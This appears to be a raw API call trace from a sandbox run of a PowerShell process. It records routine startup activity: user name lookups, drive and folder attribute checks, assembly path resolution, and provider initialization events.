	[0521.162] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x3ad740, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0521.162] CoTaskMemFree (pv=0x3ad740) 
	[0521.163] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x14d070, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0521.163] SetErrorMode (uMode=0x1) returned 0x1
	[0521.163] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x14d280 | out: lpFileInformation=0x14d280*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0521.163] SetErrorMode (uMode=0x1) returned 0x1
	[0521.164] GetLogicalDrives () returned 0x4
	[0521.165] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14cde0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0521.166] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0521.166] SetErrorMode (uMode=0x1) returned 0x1
	[0521.167] CoTaskMemAlloc (cb=0x68) returned 0x3cee10
	[0521.167] CoTaskMemAlloc (cb=0x68) returned 0x3ceda0
	[0521.167] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3cee10, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x14d250, lpMaximumComponentLength=0x14d24c, lpFileSystemFlags=0x14d248, lpFileSystemNameBuffer=0x3ceda0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14d250*=0x9c354b42, lpMaximumComponentLength=0x14d24c*=0xff, lpFileSystemFlags=0x14d248*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0521.167] CoTaskMemFree (pv=0x3cee10) 
	[0521.167] CoTaskMemFree (pv=0x3ceda0) 
	[0521.167] SetErrorMode (uMode=0x1) returned 0x1
	[0521.167] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0521.169] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14cf90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0521.169] SetErrorMode (uMode=0x1) returned 0x1
	[0521.169] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14d1f0 | out: lpFileInformation=0x14d1f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0521.169] SetErrorMode (uMode=0x1) returned 0x1
	[0521.169] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14cf90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0521.169] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14ce40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0521.170] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0521.170] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14cd70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0521.170] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0521.171] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0521.171] SetErrorMode (uMode=0x1) returned 0x1
	[0521.171] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14d020 | out: lpFileInformation=0x14d020*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0521.171] SetErrorMode (uMode=0x1) returned 0x1
	[0521.171] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0521.171] SetErrorMode (uMode=0x1) returned 0x1
	[0521.171] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14d020 | out: lpFileInformation=0x14d020*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0521.172] SetErrorMode (uMode=0x1) returned 0x1
	[0521.172] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14ce60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0521.172] SetErrorMode (uMode=0x1) returned 0x1
	[0521.172] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14d0c0 | out: lpFileInformation=0x14d0c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0521.172] SetErrorMode (uMode=0x1) returned 0x1
	[0521.172] CoTaskMemAlloc (cb=0x804) returned 0x1b974f30
	[0521.173] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b974f30, nSize=0x14d4c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d4c8) returned 0x1
	[0521.173] CoTaskMemFree (pv=0x1b974f30) 
	[0521.173] CoTaskMemAlloc (cb=0x204) returned 0x1b964a00
	[0521.173] GetUserNameW (in: lpBuffer=0x1b964a00, pcbBuffer=0x14d508 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d508) returned 1
	[0521.173] CoTaskMemFree (pv=0x1b964a00) 
	[0521.174] ReportEventW (hEventLog=0x1ba50008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d3da40*="FileSystem", lpRawData=0x2d3d7d0) returned 1
	[0521.175] CoTaskMemAlloc (cb=0x104) returned 0x3ad740
	[0521.175] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0521.175] CoTaskMemFree (pv=0x3ad740) 
	[0521.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0521.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0521.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0521.177] CoTaskMemAlloc (cb=0x804) returned 0x1b974f30
	[0521.177] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b974f30, nSize=0x14d4c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d4c8) returned 0x1
	[0521.177] CoTaskMemFree (pv=0x1b974f30) 
	[0521.178] CoTaskMemAlloc (cb=0x204) returned 0x1b964a00
	[0521.178] GetUserNameW (in: lpBuffer=0x1b964a00, pcbBuffer=0x14d508 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d508) returned 1
	[0521.178] CoTaskMemFree (pv=0x1b964a00) 
	[0521.178] ReportEventW (hEventLog=0x1ba50008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d43280*="Function", lpRawData=0x2d43010) returned 1
	[0521.182] CoTaskMemAlloc (cb=0x104) returned 0x3ad740
	[0521.182] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0521.182] CoTaskMemFree (pv=0x3ad740) 
	[0523.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0523.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0523.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0523.294] CoTaskMemAlloc (cb=0x804) returned 0x1b974f30
	[0523.294] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b974f30, nSize=0x14d4c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d4c8) returned 0x1
	[0523.295] CoTaskMemFree (pv=0x1b974f30) 
	[0523.295] CoTaskMemAlloc (cb=0x204) returned 0x1b964a00
	[0523.295] GetUserNameW (in: lpBuffer=0x1b964a00, pcbBuffer=0x14d508 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d508) returned 1
	[0523.295] CoTaskMemFree (pv=0x1b964a00) 
	[0523.296] ReportEventW (hEventLog=0x1ba50008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d65aa8*="Registry", lpRawData=0x2d65838) returned 1
	[0524.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.339] CoTaskMemAlloc (cb=0x804) returned 0x1b974f30
	[0524.339] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b974f30, nSize=0x14d4c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d4c8) returned 0x1
	[0524.339] CoTaskMemFree (pv=0x1b974f30) 
	[0524.339] CoTaskMemAlloc (cb=0x204) returned 0x1b964a00
	[0524.339] GetUserNameW (in: lpBuffer=0x1b964a00, pcbBuffer=0x14d508 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d508) returned 1
	[0524.340] CoTaskMemFree (pv=0x1b964a00) 
	[0524.340] ReportEventW (hEventLog=0x1ba50008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d6aec0*="Variable", lpRawData=0x2d6ac50) returned 1
	[0524.342] CoTaskMemAlloc (cb=0x104) returned 0x3ad740
	[0524.342] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0524.342] CoTaskMemFree (pv=0x3ad740) 
	[0524.345] CoTaskMemAlloc (cb=0x104) returned 0x3ad740
	[0524.345] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0524.345] CoTaskMemFree (pv=0x3ad740) 
	[0524.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0524.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0524.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0524.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0525.356] CoTaskMemAlloc (cb=0x804) returned 0x1b974f30
	[0525.356] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b974f30, nSize=0x14d4c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d4c8) returned 0x1
	[0526.304] CoTaskMemFree (pv=0x1b974f30) 
	[0526.304] CoTaskMemAlloc (cb=0x204) returned 0x1b964a00
	[0526.304] GetUserNameW (in: lpBuffer=0x1b964a00, pcbBuffer=0x14d508 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d508) returned 1
	[0526.304] CoTaskMemFree (pv=0x1b964a00) 
	[0526.305] ReportEventW (hEventLog=0x1ba50008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d7ead8*="Certificate", lpRawData=0x2d7e868) returned 1
	[0527.954] CoTaskMemAlloc (cb=0x104) returned 0x3ad740
	[0527.954] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0527.955] CoTaskMemFree (pv=0x3ad740) 
	[0527.958] GetLogicalDrives () returned 0x4
	[0527.958] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14d150, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0527.958] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0527.959] CoTaskMemAlloc (cb=0x20e) returned 0x3b9c70
	[0527.959] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x3b9c70 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0527.960] CoTaskMemFree (pv=0x3b9c70) 
	[0527.961] CoTaskMemAlloc (cb=0x104) returned 0x3ad740
	[0527.961] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0527.961] CoTaskMemFree (pv=0x3ad740) 
	[0527.961] CoTaskMemAlloc (cb=0x104) returned 0x3ad740
	[0527.961] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0527.962] CoTaskMemFree (pv=0x3ad740) 
	[0527.978] CoTaskMemAlloc (cb=0x104) returned 0x3ad740
	[0527.978] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0527.979] CoTaskMemFree (pv=0x3ad740) 
	[0527.980] CoTaskMemAlloc (cb=0x104) returned 0x3ad740
	[0527.980] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0527.980] CoTaskMemFree (pv=0x3ad740) 
	[0527.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0527.981] SetErrorMode (uMode=0x1) returned 0x1
	[0527.981] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14d110 | out: lpFileInformation=0x14d110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0527.981] SetErrorMode (uMode=0x1) returned 0x1
	[0527.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0527.981] SetErrorMode (uMode=0x1) returned 0x1
	[0527.981] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14d110 | out: lpFileInformation=0x14d110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0527.981] SetErrorMode (uMode=0x1) returned 0x1
	[0527.982] CoTaskMemAlloc (cb=0x104) returned 0x3ad740
	[0527.982] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0527.982] CoTaskMemFree (pv=0x3ad740) 
	[0527.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0527.984] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14cec0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0527.985] SetErrorMode (uMode=0x1) returned 0x1
	[0527.985] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14d0d0 | out: lpFileInformation=0x14d0d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0527.985] SetErrorMode (uMode=0x1) returned 0x1
	[0529.189] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14cec0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0529.189] SetErrorMode (uMode=0x1) returned 0x1
	[0529.189] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14d0d0 | out: lpFileInformation=0x14d0d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0529.190] SetErrorMode (uMode=0x1) returned 0x1
	[0529.190] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14ced0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0529.190] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0529.190] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0529.190] SetErrorMode (uMode=0x1) returned 0x1
	[0529.190] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14d0d0 | out: lpFileInformation=0x14d0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0529.190] SetErrorMode (uMode=0x1) returned 0x1
	[0529.190] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0529.191] SetErrorMode (uMode=0x1) returned 0x1
	[0529.191] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14d0d0 | out: lpFileInformation=0x14d0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0529.191] SetErrorMode (uMode=0x1) returned 0x1
	[0529.191] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0529.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x14cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0529.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0529.191] SetErrorMode (uMode=0x1) returned 0x1
	[0529.191] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14d0d0 | out: lpFileInformation=0x14d0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0529.192] SetErrorMode (uMode=0x1) returned 0x1
	[0529.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0529.192] SetErrorMode (uMode=0x1) returned 0x1
	[0529.192] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14d0d0 | out: lpFileInformation=0x14d0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0529.192] SetErrorMode (uMode=0x1) returned 0x1
